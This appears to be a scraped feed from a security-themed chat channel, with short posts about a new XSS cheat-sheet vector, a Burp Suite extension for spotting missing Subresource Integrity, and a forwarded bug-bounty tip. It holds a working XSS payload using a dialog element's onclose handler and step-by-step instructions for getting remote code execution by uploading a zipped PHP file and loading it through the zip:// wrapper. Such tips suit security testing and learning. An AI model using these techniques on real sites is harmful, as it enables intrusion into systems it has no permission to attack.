Here's an updated polyglot that uses the details tag and now breaks out of template strings too.
We have another new vector for the XSS cheat sheet! This one requires user interaction and uses the method attribute with the dialog value.

<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
Channel photo updated
sri-check | A Burp Suite extension for identifying missing Subresource Integrity attributes.

https://github.com/PortSwigger/sri-check
Forwarded from πŸ’₯CEH trainingπŸ‘¨πŸ»β€πŸ’» βš”οΈ πŸ›‘
Forwarded from WiFi Hacking
Bug Bounty Hunting Tip :-

If you can upload .zip file on target then:

1. Create a .php file (rce.php)

2. Compress it to a .zip file (file.zip)

3. Upload your .zip file on the vulnerable web application.

4. Trigger your RCE via:

( https://<target Site>.com/index.php?page=zip://path/file.zip#rce.php )